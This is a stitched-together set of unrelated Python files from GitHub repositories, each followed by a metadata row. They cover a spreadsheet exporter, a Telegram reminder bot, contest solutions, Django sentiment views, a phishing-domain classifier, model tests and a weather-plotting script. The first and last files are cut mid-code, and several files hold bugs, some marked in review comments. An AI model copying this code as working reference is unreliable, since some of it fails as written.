        # Scan input rows until every Test2 has been matched.
        while i < len(all_rows) and match_count < len(self.check2.test2s):
            row = all_rows[i]
            year = row['year']
            month = BackendUtils.pad_num_str(row['month'])
            day = BackendUtils.pad_num_str(row['day'])
            elapsed_sec = row['Elapsed_Time']
            key = Reliability2Parser.get_child_code(row) + '%s %s %s %s' % (day, month, year, elapsed_sec) #row['clock_time_tzadj']
            if key in test2_dict:
                row[extra_headers[0]] = test2_dict[key][0].child_vocs
                row[extra_headers[1]] = BackendUtils.get_word_count(test2_dict[key][0].transcription)
                if include_trans:
                    row[extra_headers[2]] = test2_dict[key][0].transcription
                match_count += 1
                out_rows[test2_dict[key][1]] = row
            if progress_update_fcn:
                progress_update_fcn(float(i + 1) / float(len(all_rows)))
            i += 1
        if progress_next_fcn:
            progress_next_fcn()
        # Write the matched rows in run order; a gap means the input
        # spreadsheet no longer matches the Check2 data.
        for i in range(len(out_rows)):
            row = out_rows[i]
            if row == None:
                raise Exception('Unable to match Test2 object with input spreadsheet row. Has spreadsheet changed?')
            else:
                writer.writerow(row)
            if progress_update_fcn:
                progress_update_fcn(float(i + 1) / float(len(out_rows)))
    ## Closes this parser. This just closes all the open files that it is using.
    # Calling this method is necessary to ensure that all of the data that was written to the csv file is actually flushed to disk.
    # @param self
    def close(self):
        self.out_file.close()
        self.in_file.close()
| babylanguagelab/bll_app | wayne/parsers/reliability2_exporter.py | reliability2_exporter.py | py | 4,456 | python | en | code | 0 | github-code | 90 |
18978100467 | import aioschedule
from aiogram import types, Dispatcher
from config import bot
import asyncio
async def get_chat_id(message: types.Message):
    """Remember the sender's chat id (module-global) and acknowledge.

    The id is later used by go_to_sleep() to address the reminder.
    """
    global chat_id
    chat_id = message.from_user.id
    await message.answer("OK")
async def go_to_sleep():
    # Send the reminder (Russian: "Time to study!") to the remembered chat.
    # NOTE(review): raises NameError if no message set chat_id beforehand.
    await bot.send_message(chat_id=chat_id, text="Пора учиться!")
async def scheduler():
    """Register the weekly reminder job and poll pending jobs forever."""
    # NOTE(review): chaining two weekday selectors (.friday.tuesday) is
    # not a valid "Friday AND Tuesday" schedule in schedule/aioschedule —
    # the later selector overrides the earlier one. Confirm intent; two
    # separate every().friday / every().tuesday jobs may be needed.
    aioschedule.every().friday.tuesday.at("20:00").do(go_to_sleep)
    while True:
        await aioschedule.run_pending()
        await asyncio.sleep(2)
def register_handlers_notification(dp: Dispatcher):
    """Register get_chat_id for any message whose text contains "go"."""
    dp.register_message_handler(get_chat_id,
                                lambda word: "go" in word.text)
18310151949 | n = int(input())
S = input()
L = []
ans = 0
for i in range(10):
for j in range(10):
for k in range(10):
cnt = 0
iflag = 0
jflag = 0
while True:
if cnt >= n:
break
if iflag == 0 and S[cnt] == str(i):
iflag = 1
cnt += 1
continue
if iflag == 1 and jflag == 0 and S[cnt] == str(j):
jflag= 1
cnt += 1
continue
if jflag == 1 and S[cnt] == str(k):
ans += 1
break
cnt += 1
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02844/s767950651.py | s767950651.py | py | 536 | python | en | code | 0 | github-code | 90 |
20404015516 | import sys
from collections import deque
import heapq
# import itertools
# import math
# import bisect
sys.setrecursionlimit(10**9)
input = sys.stdin.readline
INF = sys.maxsize
def max_weighted_digit_sum(words):
    """Return the maximum total value obtainable by assigning distinct digits
    to letters.

    Every letter occurrence contributes a positional weight of
    ``10 ** (position from the right)`` within its word; the heaviest letter
    gets digit 9, the next 8, and so on (digits keep decrementing past 0 if
    there are more than 10 distinct letters, matching the original code).
    """
    weight = {}
    for word in words:
        for pos, ch in enumerate(word):
            weight[ch] = weight.get(ch, 0) + 10 ** (len(word) - pos - 1)
    total = 0
    digit = 9
    for w in sorted(weight.values(), reverse=True):
        total += digit * w
        digit -= 1
    return total


if __name__ == "__main__":
    N = int(input())
    # BUG FIX: `input` is rebound to sys.stdin.readline above, which keeps the
    # trailing newline; the original fed the raw line into the weight table,
    # so '\n' became a weighted "letter" and every real weight was scaled x10.
    words = [input().rstrip() for _ in range(N)]
    total = max_weighted_digit_sum(words)
print(total) | taewan2002/ProblemSolving | test/test.py | test.py | py | 629 | python | en | code | 4 | github-code | 90 |
18454274079 | s = int(input())
def first_repeat_step(start):
    """Return the 1-based index of the first term of the sequence
    ``a_1 = start``, ``a_{k+1} = a_k / 2`` (a_k even) or ``3*a_k + 1``
    (a_k odd) that equals some earlier term.

    Uses a set of seen values, so it is not limited to values <= 10**6 the
    way the original fixed-size boolean table was (3*s + 1 could index past
    the end of that table for large s).
    """
    seen = {start}
    step = 1
    value = start
    while True:
        step += 1
        value = value // 2 if value % 2 == 0 else 3 * value + 1
        if value in seen:
            return step
        seen.add(value)


if __name__ == "__main__":
    # Guarded so the helper stays importable; `s` was read above and
    # `print(i)` below still sees the result when run as a script.
    i = first_repeat_step(s)
print(i) | Aasthaengg/IBMdataset | Python_codes/p03146/s318427996.py | s318427996.py | py | 223 | python | en | code | 0 | github-code | 90 |
18370518239 | #!/usr/bin/env python3
from collections import Counter
def judge(a):
    """Return "Yes" or "No" for the list *a*, preserving the original rule:

    "Yes" when every element is 0, or when the distinct values XOR to 0 and
    each distinct value occupies exactly a third of the list, or when there
    are exactly two distinct values, the majority value fills two thirds of
    the list and the minority value is 0. Otherwise "No".
    """
    n = len(a)  # the problem guarantees the declared n equals len(a)
    c = Counter(a)
    xor_of_values = 0
    for value in c.keys():
        xor_of_values ^= value
    if sum(a) == 0 or (xor_of_values == 0
                       and all(count * 3 == n for count in c.values())):
        return "Yes"
    if (len(c) == 2 and c.most_common()[0][1] * 3 == 2 * n
            and c.most_common()[1][0] == 0):
        return "Yes"
    return "No"


if __name__ == "__main__":
    n = int(input())
    (*a, ) = map(int, input().split())
    print(judge(a))
| Aasthaengg/IBMdataset | Python_codes/p02975/s548905360.py | s548905360.py | py | 372 | python | en | code | 0 | github-code | 90 |
18410362519 | def main():
    """Read N strings and print the maximum number of "AB" substrings
    achievable by concatenating all of them in some order (each string's
    internal "AB"s plus the ones created at the junctions)."""
    N = int(input())
    A = [input() for i in range(N)]
    ans = 0
    ba = 0  # strings that start with 'B' AND end with 'A'
    b = 0   # strings that start with 'B' (and do not end with 'A')
    a = 0   # strings that end with 'A' (and do not start with 'B')
    for s in A:
        ans += s.count("AB")  # "AB"s already inside each individual string
        if s[0] == "B" and s[-1] == "A":
            ba += 1
        elif s[0] == "B":
            b += 1
        elif s[-1] == "A":
            a += 1
    # Chaining all the B...A strings together creates ba-1 junction "AB"s.
    ans += (ba - 1 if ba > 1 else 0)
    if ba > 0 and a > 0 and b > 0:
        # The chained B...A block behaves as one extra "...A" and one extra
        # "B...", so it adds one more junction on top of min(a, b).
        b += 1
        a += 1
        ans += min(a, b)
    elif ba > 0 and a == 0 and b == 0:
        pass  # the chain has nothing to attach to on either side
    elif ba > 0 and a > 0:
        ans += 1  # attach one ...A string in front of the chain
    elif ba > 0 and b > 0:
        ans += 1  # attach one B... string behind the chain
    elif ba == 0:
        ans += min(a, b)  # pair ...A strings directly with B... strings
    print(ans)
if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03049/s900354154.py | s900354154.py | py | 674 | python | en | code | 0 | github-code | 90 |
35827356473 | import os
import pandas as pd
from src.envs.jcsr.ds.coflow import Coflow
from src.envs.jcsr.ds.flow import Flow
class Trace:
    """
    Parser for traces of the following format:
    Line1 : <Num_Ports> - <Num_Coflows> - <Num_Flows>
    Num_Flows lines below: <Flow_id> - <Arrival-time> - <Coflow-id> - <Source> - <Destination> - <Size>
    The traces are generated using the flow-generator.py script within the res/traces folder of this repo
    """
    def __init__(self, trace_file):
        """Parse *trace_file* immediately.

        Raises FileNotFoundError if the file does not exist.
        """
        # The original evaluated os.path.exists() and discarded the result,
        # so a bad path only surfaced later inside parse_trace(); fail fast.
        if not os.path.exists(trace_file):
            raise FileNotFoundError(trace_file)
        self.trace_file = trace_file
        self.coflows = []   # one Coflow object per coflow id in the trace
        self.flows = []     # flat list of every Flow in the trace
        self.num_flows = 0
        self.num_coflows = 0
        self.num_ports = 0
        self.parse_trace()
    def parse_trace(self):
        """Read the header line, then group the flow rows into Coflow objects."""
        # Header: "<num_ports> <num_coflows> <num_flows>" (read-only access
        # suffices, so open with 'r' instead of the original 'r+').
        with open(self.trace_file, 'r') as f:
            header_list = f.readline().rstrip().split(' ')
            self.num_ports = int(header_list[0])
            self.num_coflows = int(header_list[1])
            self.num_flows = int(header_list[2])
        # Re-read the body with pandas, skipping the header row.
        df = pd.read_csv(self.trace_file, skiprows=[0], sep=' ',
                         names=['flow-id', 'arrival-time', 'coflow-id',
                                'src', 'dest', 'size'])
        for coflow_id, frame in df.groupby('coflow-id'):
            flows_in_coflow = []
            coflow_size = 0  # MBs
            for row in frame.itertuples(index=False, name=None):
                flow = Flow(row[0], row[1], coflow_id, row[3], row[4], row[5])
                coflow_size += row[5]
                flows_in_coflow.append(flow)
            # A coflow arrives when its first flow arrives.
            coflow = Coflow(coflow_id, flows_in_coflow[0].arrival_time,
                            coflow_size, flows_in_coflow)
            # length = size of the largest flow; width = number of flows.
            coflow.length = max(flow.size for flow in flows_in_coflow)
            coflow.width = len(flows_in_coflow)
            self.coflows.append(coflow)
| adnan904/DeepJCSR | src/envs/jcsr/parsers/trace_parser.py | trace_parser.py | py | 1,929 | python | en | code | 0 | github-code | 90 |
36267139263 | from django.shortcuts import render
from django.core.files.storage import FileSystemStorage
import requests
import os
import re
from SentimentAnalysisApi import clean_text
from SentimentAnalyzer.settings import BASE_DIR
''' Import for Image Processsing '''
from SentimentAnalysisUI.util import image_process
''' Import for Audio Processing '''
from SentimentAnalysisUI.util import audio_process
''' Import for Video Processing '''
from SentimentAnalysisUI.util import video_process
API_URL = "http://127.0.0.1:8000/classify/"  # local sentiment-classification REST endpoint
process = clean_text.TextPreprocess()  # shared text normaliser used by the analyze* views
''' Main Methods '''
def index(request):
    """Render the landing page."""
    return render(request, 'index.html')
def textProcess(request):
    """Render the text-input form."""
    return render(request, 'text_extract.html')
def imageProcess(request):
    """Render the image-upload form."""
    return render(request, 'image_extract.html')
def audioProcess(request):
    """Render the audio-upload form."""
    return render(request, 'audio_extract.html')
def videoProcess(request):
    """Render the video-upload form."""
    return render(request, 'video_extract.html')
''' Sub Methods '''
def analyzeText(request):
    """Classify the sentiment of text submitted from the text form.

    Sends the raw text to the sentiment REST API and renders the result
    page with the returned label.
    """
    # Initialise up front so the render below never raises NameError when
    # the request is not a POST or the API call fails (original bug: both
    # names were only bound inside the try/POST branch).
    text = ""
    sentiment = None
    try:
        if request.method == 'POST':
            text = request.POST.get("userText")
            params = {'text': text}
            response = requests.get(url=API_URL, params=params)
            data = response.json()
            sentiment = data["text_sentiment"]
    except Exception as ex:
        print("Exception Occured ", ex)
    return render(request, 'result.html', {'type': 'text_sentiment', 'given_text': text, 'result': sentiment})
def analyzeImage(request):
    """Run OCR on an uploaded image, normalise the text, and classify its
    sentiment via the REST API."""
    if request.method == "POST":
        my_uploaded_file = request.FILES['uploaded_img']  # get the uploaded file
        fs = FileSystemStorage()
        filename = fs.save(my_uploaded_file.name, my_uploaded_file)
        uploaded_file_path = fs.path(filename)
        # OCR the stored image, then normalise the text for the classifier.
        imageProcess = image_process.ImageProcess()
        imgText = imageProcess.image_to_text(uploaded_file_path)
        cleaned_text = process.normalizer(imgText)
        # (removed: a dead `output = re.sub(...)` computation whose result
        # was never used)
        params = {'text': cleaned_text}
        response = requests.get(url=API_URL, params=params)
        data = response.json()
        sentiment = data["text_sentiment"]
    # NOTE(review): a non-POST request reaches this line with imgText and
    # sentiment unbound (NameError); presumably URL routing only sends POSTs.
    return render(request, 'result.html', {'type': 'image_sentiment', 'given_text': imgText, 'result': sentiment})
def analyzeAudio(request):
    """Transcribe an uploaded audio file, normalise the transcript, and
    classify its sentiment via the REST API."""
    if request.method == "POST":
        my_uploaded_file = request.FILES['uploaded_audio']  # get the uploaded file
        fs = FileSystemStorage()
        filename = fs.save(my_uploaded_file.name, my_uploaded_file)
        uploaded_file_path = fs.path(filename)
        # Speech-to-text on the stored file, then normalise for the classifier.
        audioProcess = audio_process.AudioProcess()
        audioText = audioProcess.get_large_audio_transcription(uploaded_file_path)
        cleaned_text = process.normalizer(audioText)
        # (removed: a dead `output = re.sub(...)` computation whose result
        # was never used)
        params = {'text': cleaned_text}
        response = requests.get(url=API_URL, params=params)
        data = response.json()
        sentiment = data["text_sentiment"]
    # NOTE(review): a non-POST request reaches this line with cleaned_text and
    # sentiment unbound (NameError); presumably URL routing only sends POSTs.
    return render(request, 'result.html', {'type': 'audio_sentiment', 'given_text': cleaned_text, 'result': sentiment})
def analyzeVideo(request):
    """Extract text from an uploaded video (frame OCR or speech-to-text,
    chosen by the "sentiment-choice" form field) and classify its sentiment."""
    if request.method == "POST":
        my_uploaded_file = request.FILES['uploaded_video'] # get the uploaded file
        choice = request.POST.get("sentiment-choice")
        fs = FileSystemStorage()
        filename = fs.save(my_uploaded_file.name, my_uploaded_file)
        uploaded_file_path = fs.path(filename)
        videoProcess = video_process.VideoProcess()
        if choice == "text":
            frames_path = videoProcess.extract_frames(uploaded_file_path)
            extract_text = videoProcess.extract_frame_text(frames_path)
            # NOTE(review): cleaned_text is NOT assigned in this branch, so the
            # `params = {'text': cleaned_text}` line below raises NameError for
            # the "text" choice. Likely missing:
            # cleaned_text = process.normalizer(extract_text) -- confirm and fix.
        elif choice == "audio":
            audioPath = videoProcess.video_to_audio(uploaded_file_path)
            audioProcess = audio_process.AudioProcess()
            extract_text = audioProcess.get_large_audio_transcription(audioPath)
            cleaned_text = process.normalizer(extract_text)
        else:
            # NOTE(review): invalid choice only prints; execution still falls
            # through to the API call with both names unbound.
            print("invalid")
        params = {'text': cleaned_text}
        response = requests.get(url=API_URL, params=params)
        data = response.json()
        sentiment = data["text_sentiment"]
    return render(request, 'result.html', {'type': 'video_sentiment', 'given_text': extract_text, 'result': sentiment}) | sprao-cs/SentimentAnalyzer-Django-Scikit-Learn | SentimentAnalyzer/SentimentAnalysisUI/views.py | views.py | py | 4,600 | python | en | code | 2 | github-code | 90 |
28368099455 | import csv
import sys
# Build ../<type>_dataset.csv with "<video_path>,<word_id>" rows from the
# per-word columns of ../<type>_unique.csv; the dataset type comes from argv.
typename = str(sys.argv[1])
gsl_path = "../GSL_isol/"  # NOTE(review): unused -- leftover from an earlier version?
final_dataset_file = '../' + typename + '_dataset.csv'
open(final_dataset_file,'w').close()  # truncate any previous dataset file
with open(final_dataset_file, "a") as datf:
    csvwriter = csv.writer(datf, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
    readname = '../' + typename + '_unique.csv'
    with open(readname,'r') as csvf:
        csvreader = csv.reader(csvf, delimiter=",")
        headers = next(csvreader, None)  # consume (and echo) the header row
        print(headers)
        for row in csvreader:
            if len(row) == 0: continue
            word_id = 0  # the column index doubles as the word/class id
            for video_path in row:
                if video_path == '':
                    word_id += 1
                    continue
                pathlist = [video_path,str(word_id)]
                csvwriter.writerow(pathlist)
                word_id += 1 | george22294/Sign_language_recognition | code/tested_on_ubuntu/2_create_dataset.py | 2_create_dataset.py | py | 859 | python | en | code | 0 | github-code | 90 |
19821071070 | """Generic Plotting Functions"""
import os
import matplotlib as mpl
import boto3
from pyleecan.Classes.MachineUD import MachineUD
from pylee_ext.main import expand_pylee_classes, get_pylee_machine
from utils.global_functions import convert_dict_to_floats, setup_input
def create_axial_slice(machine_dict):
    """
    Checks if machine input is valid and generates 2D axial view of machine
    Parameters
    ----------
    machine_dict: dict
        Machine Input from Frontend
    Returns
    -------
    img_dict: dict
        Contains S3 image location, validity of machine dimensions, error msg (optional)
    """
    expand_pylee_classes()
    convert_dict_to_floats(machine_dict)
    setup_input(machine_dict)
    machine = get_pylee_machine(machine_dict)
    machine = machine.json_to_pyleecan(machine_dict)
    #Convert user input to pyleecan format
    # machine_dict = json.load(os.path.join('Debug', 'machine.json'))
    # material_db = get_material_db(os.path.join(lptn_root, "Input", "Material"))
    # machine = json_to_pyleecan(machine_dict, material_db)
    #Check machine
    # MachineUD's check() takes the raw dict; other machine types take no args.
    valid_machine = True
    try:
        if isinstance(machine, MachineUD):
            machine.check(machine_dict)
        else:
            machine.check()
    except Exception as err:
        valid_machine = False
        err_msg = str(err)
    #Plot machine
    # NOTE(review): the plot/upload still run even when check() failed --
    # confirm that rendering an invalid machine is intended.
    os.makedirs('temp', exist_ok=True)
    img_path = os.path.join('temp', 'MachinePlot.png')
    machine.plot(save_path=img_path, is_show_fig=False)
    #Upload image to S3
    bucket = os.environ["BUCKET_NAME"]
    id = machine_dict['id']  # shadows the builtin `id`; local use only
    s3_img_path = f"s3://{bucket}/{id}/MachinePlot.png"
    s3 = boto3.resource('s3')
    s3.meta.client.upload_file(img_path, f"{bucket}", f"{id}/MachinePlot.png")
    #Delete Local Plot
    if os.path.exists(img_path):
        os.remove(img_path)
    img_dict = {
        "valid_machine": valid_machine,
        "img_loc": s3_img_path
    }
    if not valid_machine:
        img_dict["error"] = err_msg
    return img_dict
def get_temp_color(t, t_min=0.0, t_max=100.0, cmap='jet'):
    """
    Normalises t for range t_max-t_min and converts it to RGBA color for plotting.
    Parameters
    ----------
    t: float
        Current temperature; must lie within [t_min, t_max].
    t_min: float
    t_max: float
    cmap: str
        matplotlib colormap
    Returns
    -------
    temp_map: rgba tuple
    Raises
    ------
    ValueError
        If t lies outside [t_min, t_max] or the range is empty.
    """
    # NOTE: mpl.cm.get_cmap is deprecated/removed in matplotlib >= 3.9;
    # mpl.colormaps[cmap] is the modern equivalent -- kept for compatibility
    # with the version this project pins.
    temp_map = mpl.cm.get_cmap(cmap)
    # Guard the degenerate range up front (the original divided by zero
    # when t_max == t_min).
    if t_max <= t_min:
        raise ValueError("t_max must be greater than t_min")
    if t < t_min:
        raise ValueError("Current temperature is below minimum temperature")
    if t > t_max:
        raise ValueError("Current temperature is above maximum temperature")
    t_norm = (t - t_min) / (t_max - t_min)
    return temp_map(t_norm)
26965501327 | from flask.views import MethodView
from biweeklybudget import settings
from biweeklybudget.utils import dtnow
from biweeklybudget.flaskapp.app import app
class DateTestJS(MethodView):
    """
    Handle GET /utils/datetest.js endpoint.
    """
    def get(self):
        """Return a JS snippet defining BIWEEKLYBUDGET_DEFAULT_DATE.

        Uses the browser's real current date unless a test timestamp is
        configured, in which case the frozen dtnow() date is baked in.
        """
        if settings.BIWEEKLYBUDGET_TEST_TIMESTAMP is None:
            return 'var BIWEEKLYBUDGET_DEFAULT_DATE = new Date();'
        dt = dtnow()
        # JavaScript Date months are 0-based, hence dt.month - 1.
        return 'var BIWEEKLYBUDGET_DEFAULT_DATE = new Date(%s, %s, %s);' % (
            dt.year, (dt.month - 1), dt.day
        )
def set_url_rules(a):
    """Register this module's routes on the given Flask app."""
    a.add_url_rule(
        '/utils/datetest.js',
        view_func=DateTestJS.as_view('date_test_js')
    )
# Register the routes on import.
set_url_rules(app)
| jantman/biweeklybudget | biweeklybudget/flaskapp/views/utils.py | utils.py | py | 698 | python | en | code | 87 | github-code | 90 |
11064117628 | """Message model tests"""
import os
from unittest import TestCase
from models import db, User, Message, Follows, Likes
# Point SQLAlchemy at the test database BEFORE `from app import app` below --
# presumably app reads DATABASE_URL at import time; verify against app.py.
os.environ['DATABASE_URL'] = "postgresql:///warbler-test"
from app import app
db.create_all()
# Data for creating test users
USER_1_DATA = {
    "email": "test@test.com",
    "username": "test1user",
    "password": "HASHED_PASSWORD"
}
USER_2_DATA = {
    "email": "test2@test.com",
    "username": "test2user",
    "password": "HASHED_PASSWORD"
}
class MessageModelTestCase(TestCase):
    """Test message model."""
    def setUp(self):
        """Clear any errors, clear tables, create test client."""
        db.session.rollback()
        User.query.delete()
        Message.query.delete()
        Follows.query.delete()
        # NOTE(review): Message.query.delete() is repeated; the second call
        # was probably meant to be Likes.query.delete() -- confirm.
        Message.query.delete()
        self.client = app.test_client()
    def test_message_model(self):
        """Does the basic model work?"""
        u = User(**USER_1_DATA)
        db.session.add(u)
        db.session.commit()
        m = Message(text="Test message", user_id=u.id)
        db.session.add(m)
        db.session.commit()
        # The message should carry its text, its owner linkage, and the
        # DB-generated defaults (timestamp, primary key).
        self.assertEqual(m.text, "Test message")
        self.assertEqual(m.user_id, u.id)
        self.assertEqual(m.user, u)
        self.assertTrue(m.timestamp)
        self.assertTrue(m.id)
    def test_message_like(self):
        """Test one user liking another user's message"""
        u1 = User(**USER_1_DATA)
        u2 = User(**USER_2_DATA)
        db.session.add_all([u1, u2])
        db.session.commit()
        m = Message(text="Test message", user_id=u1.id)
        u2.likes.append(m)
        db.session.commit()
        likes = Likes.query.all()
        # Exactly one Likes row linking u2 to u1's message is expected,
        # visible from both sides of the relationship.
        self.assertIn(m, u2.likes)
        self.assertEqual(len(likes), 1)
        self.assertEqual(likes[0].user_id, u2.id)
        self.assertEqual(likes[0].message_id, m.id)
        self.assertIn(u2, m.liked_by)
        self.assertNotIn(u1, m.liked_by)
    def test_message_unlike(self):
        """Test that removing message from user's likes removes the Like"""
        u1 = User(**USER_1_DATA)
        u2 = User(**USER_2_DATA)
        db.session.add_all([u1, u2])
        db.session.commit()
        m = Message(text="Test message", user_id=u1.id)
        u2.likes.append(m)
        db.session.commit()
        # The above tested to show message liked by u2; now remove and test
        u2.likes.remove(m)
        db.session.commit()
        likes = Likes.query.all()
        # Removing the like must delete the row and both relationship views.
        self.assertNotIn(m, u2.likes)
        self.assertEqual(len(likes), 0)
        self.assertNotIn(u2, m.liked_by)
| lauramoon/warbler | test_message_model.py | test_message_model.py | py | 2,563 | python | en | code | 0 | github-code | 90 |
15048685577 | '''
NOTE: The global keywords are only placed there because I like to analyze my variables individually in the Variable Explorer.
The Variable Explorer is available for IDEs like Spyder, Pycharm etc. I use Spyder.
So you can totally remove them (the lines with the global keywords) if you do not need that. The program will still run and print your accuracy to you.
'''
import pandas as pd
'''
This is the Function that does the Magic (Preciction/Classification)
To use the Function: phishing_domain_detector(Name of Dataset file in csv format) as seen on line 49.
'''
def phishing_domain_detector(file=""):
    """Train a decision-tree classifier on the labeled phishing dataset in
    *file* (csv, label in the last column) and print its accuracy on a 30%
    hold-out split.

    Intermediate results (X, Y, the splits, dtree, accuracy) are published
    as module globals so they can be inspected in an IDE variable explorer
    (see the module docstring).
    """
    # Load the Data
    data = pd.read_csv(file)
    # Split Data into features X and label Y (label is the last column)
    global X, Y
    X = data.iloc[:,:-1]
    Y = data.iloc[:,-1]
    # Split data into Training and Testing Data.
    from sklearn.model_selection import train_test_split
    global x_train, x_test, y_train, y_test
    x_train, x_test, y_train, y_test = \
        train_test_split(X,Y, test_size=0.3, random_state=1234)
    # Perform Decision Tree classification
    from sklearn import tree
    global dtree
    dtree = tree.DecisionTreeClassifier()
    # Handling Exceptions
    try:
        dtree.fit(x_train, y_train)
    except Exception: # This is for When the Data isn't properly Labeled.
        print("[-] Please Ensure your data is properly Labeled\n[-] Exiting...")
        import sys
        sys.exit() # Exit the Program if Data isn't properly Labeled.
    else:
        prediction = dtree.predict(x_test)
        # Measure our accuracy (accuracy_score is symmetric, so the
        # (prediction, y_test) argument order does not change the result)
        from sklearn.metrics import accuracy_score
        global accuracy
        accuracy = accuracy_score(prediction, y_test) * 100
        print("Accuracy is", accuracy)
phishing_domain_detector("Training Dataset.csv")
| Muhammad-aa/Phishing-Domain-Detection | Phishing Domain Detector.py | Phishing Domain Detector.py | py | 1,843 | python | en | code | 3 | github-code | 90 |
36070112831 | """
*Script plots March 2012 200mb winds and height fields.
Data for March 2010 is also available for plotting*
"""
import best_NCEPreanalysis_synop_datareader as N #function reads in data from NCEP
import numpy as np
from scipy.stats import nanmean
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, interp
### Call NCEP Functions
u12,level,latitude,longitude = N.wind('u',2012)
v12,level,latitude,longitude = N.wind('v',2012)
hgts12,level,latitude,longitude = N.hgt(2012)
#temp12,level,latitude,longitude = N.temp(2012)
#u10,level1,latitude1,longitude1 = N.wind20('u',1910)
#v10,level1,latitude1,longitude1 = N.wind20('v',1910)
#hgts10,level,latitude1,longitude1 = N.hgt20(1910)
#lftx,latitude,longitude = N.lftx(2012)
#mhgts,levelmh,latitudemh,longitudemh = N.climo('hgt')
#slp12,latitude,longitude = N.MSLP(2012)
lonq = np.where((longitude > 180) & (longitude < 305))
lonq = np.squeeze(lonq)
lon = longitude[lonq]
latq = np.where((latitude > 20) & (latitude < 65))
latq = np.squeeze(latq)
lat = latitude[latq]
#lonq1 = np.where((longitude1 > 180) & (longitude1 < 305))
#lonq1 = np.squeeze(lonq1)
#lon1 = longitude1[lonq1]
#latq1 = np.where((latitude1 > 20) & (latitude1 < 65))
#latq1 = np.squeeze(latq1)
#lat1 = latitude1[latq1]
lons,lats = np.meshgrid(lon,lat)
#lon1,lat1 = np.meshgrid(lon1,lat1)
### Restrict Domain Over United States
u12 = u12[:,9,latq,73:122]
v12 = v12[:,9,latq,73:122]
hgt12 = hgts12[:,9,latq,73:122]
#temp12 = temp12[:,0,latq,73:122]
#u10 = u10[:,16,latq1,91:153]
#v10 = v10[:,16,latq1,91:153]
#hgt10 = hgts10[:,16,latq1,91:153]
#lftx = lftx[:,latq,93:122]
#mhgts12 = mhgts[84,9,latq,73:122]
#mhgts10 = mhgts[84,9,latq,73:122]
#slp12 = slp12[:,latq,73:122]
### Calculate Mean SLP Proceeding 20 days
#slpq = []
#for doy in xrange(71,86):
# slpn = slp12[doy,:,:]
# slpq.append(slpn)
#slpq = np.asarray(slpq)
#aveslp = nanmean(slpq)
#slp_mean = aveslp/100.
#
#slp_mean[np.where(slp_mean < 970.)] = 970.
#slp_mean[np.where(slp_mean > 1041.)] = 1041.
###Calculate Mean Winds
uq12 = []
for doy in xrange(83,86):
un12 = u12[doy,:,:]
uq12.append(un12)
uq12 = np.asarray(uq12)
aveu12 = nanmean(uq12)
#uq10 = []
#for doy in xrange(76,88):
# un10 = u10[doy,:,:]
# uq10.append(un10)
#uq10 = np.asarray(uq10)
#aveu10 = nanmean(uq10)
vq12 = []
for doy in xrange(83,86):
vn12 = v12[doy,:,:]
vq12.append(vn12)
vq12 = np.asarray(vq12)
avev12 = nanmean(vq12)
#vq10 = []
#for doy in xrange(76,88):
# vn10 = v10[doy,:,:]
# vq10.append(vn10)
#vq10 = np.asarray(vq10)
#avev10 = nanmean(vq10)
### Calculate Mean Geopotential Heights Proceeding 20 Days
hgtq12 = []
for doy in xrange(83,86):
hgtn12 = hgt12[doy,:,:]
hgtq12.append(hgtn12)
hgtq12 = np.asarray(hgtq12)
avehgts12 = nanmean(hgtq12)
#hgtq10 = []
#for doy in xrange(76,88):
# hgtn10 = hgt10[doy,:,:]
# hgtq10.append(hgtn10)
#hgtq10 = np.asarray(hgtq10)
#avehgts10 = nanmean(hgtq10)
### Calculate Geopotential Height Anomaly
#hgt12 = hgt12[75,:,:]
#ahgt12 = hgt12 - avehgts12
#
#hgt10 = hgt10[84,:,:]
#ahgt10 = hgt10 - avehgts10
#### Daily Values for a particular level
#u = u[67,0,:,:]
#v = v[67,0,:,:]
#lftx = lftx[67,:,:]
### Basemap Plot SLP for March 1910 and 2012
#m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
# urcrnrlat=61,resolution='l')
#m.drawstates()
#m.drawcountries()
#m.drawmapboundary(fill_color = 'white')
#m.drawcoastlines(color='black',linewidth=0.5)
#m.drawlsmask(land_color='grey',ocean_color='w')
#x,y = m(lon,lat)
#cs = m.contour(x,y,slp_mean,11,colors='k')
#cs1 = m.contourf(x,y,slp_mean,np.arange(970,1041,1))
#cbar = m.colorbar(cs1,location='bottom',pad='5%',ticks=[np.arange(970,1041,5)])
#cbar.set_label('Pressure (hPa)')
#plt.title('10-25 March 2012, Sea Level Pressure',fontsize=20)
#directory = '/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/'
#plt.savefig(directory + 'meanslp.2012.png',dpi=200)
#plt.show()
#### Basemap Plot Heights
#m = Basemap(projection='merc',llcrnrlon=235,llcrnrlat=25,urcrnrlon=300,
# urcrnrlat=54,resolution='l')
#m.drawstates()
#m.drawcountries()
#m.drawmapboundary(fill_color = 'white')
#m.drawcoastlines(color='black',linewidth=0.5)
#m.drawlsmask(land_color='grey',ocean_color='w')
#x,y = m(lon,lat)
#cs = m.contour(x,y,ahgt,15,colors='k')
#cs1 = m.contourf(x,y,ahgt,range(-450,600,2))
#cs = m.barbs(x,y,u,v,15)
#cbar = m.colorbar(cs1,location='bottom',pad='5%')
#cbar.set_label('Meters')
#plt.title('Geopotential Height (250mb) Trend (20 days) March 13, 2012')
#
#directory = '/volumes/eas-shared/ault/ecrl/spring-indices/LENS_SpringOnset/Results/'
#plt.savefig(directory + '2012.hgttrend.march.007.png',dpi=300)
#plt.show()
speed12 = np.sqrt(aveu12**2+avev12**2)
#speed10 = np.sqrt(aveu10**2+avev10**2)
speed12[np.where(speed12 <25)] = np.nan
#speed10[np.where(speed10 <25)] = np.nan
time = ['1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20']
days = list(xrange(60,81))
### Create Figure
#for i in xrange(len(time)):
# fig = plt.figure()
# us12 = u12[days[i]]
# vs12 = v12[days[i]]
# speeds12 = speed12[days[i]]
# speeds12[np.where(speeds12<25)]=25
# speeds12[np.where(speeds12>55)]=55
# hgtss12 = hgt12[days[i]]
# #fig.suptitle('200 mb Daily Mean Winds and Heights',fontsize=16)
# ### Panel 1
# #ax1 = fig.add_subplot(211)
# m = Basemap(projection='merc',llcrnrlon=183,llcrnrlat=25,urcrnrlon=297,
# urcrnrlat=61,resolution='l')
# m.drawstates()
# m.drawcountries()
# m.drawmapboundary(fill_color = 'white')
